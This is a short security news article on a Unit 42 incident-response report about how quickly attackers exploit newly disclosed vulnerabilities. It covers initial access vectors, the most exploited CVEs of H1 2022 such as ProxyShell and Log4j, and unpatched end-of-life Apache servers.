Malicious actors are increasingly quick to exploit high-profile zero-day vulnerabilities, with the scanning starting within15 minutes of a new CVE being publicly disclosed, a new report from Palo Alto's Unit 42 has revealed.
Based on the collected data on more than 600 incident response cases, the researchers concluded that software vulnerabilities remain one of the top initial access vectors for threat actors (31% of the analyzed cases), second only to phishing at 37%. Other access vectors include brute-force credential attacks (9%), previously compromised credentials (6%), insider threat and social engineering (5%), abuse of trusted relationships/tools (4%).
The reports says that the most exploited vulnerabilities for network access in H1 2022 are the three ProxyShell vulnerabilities (55%), Log4j (14%), SonicWall CVEs (7%), ProxyLogon (5%), Zoho ManageEngine ADSelfService Plus (4%), Fortinet CVEs (3%).
“While some threat actors continue to rely on older, unpatched vulnerabilities, we’re increasingly seeing that the time from vulnerability to exploit is getting shorter. In fact, it can practically coincide with the reveal if the vulnerabilities themselves and the access that can be achieved by exploiting them are significant enough,” the researchers wrote in a blog post.
Additionally, end-of-life (EoL) systems remain unpatchable and available to an opportunistic attacker for exploitation, they noted. According to the report, nearly 32% of exposed organizations are running the EoL version of Apache Web Server, which is open for remote code execution courtesy of the CVE-2021-41773 and CVE-2021-42013 vulnerabilities.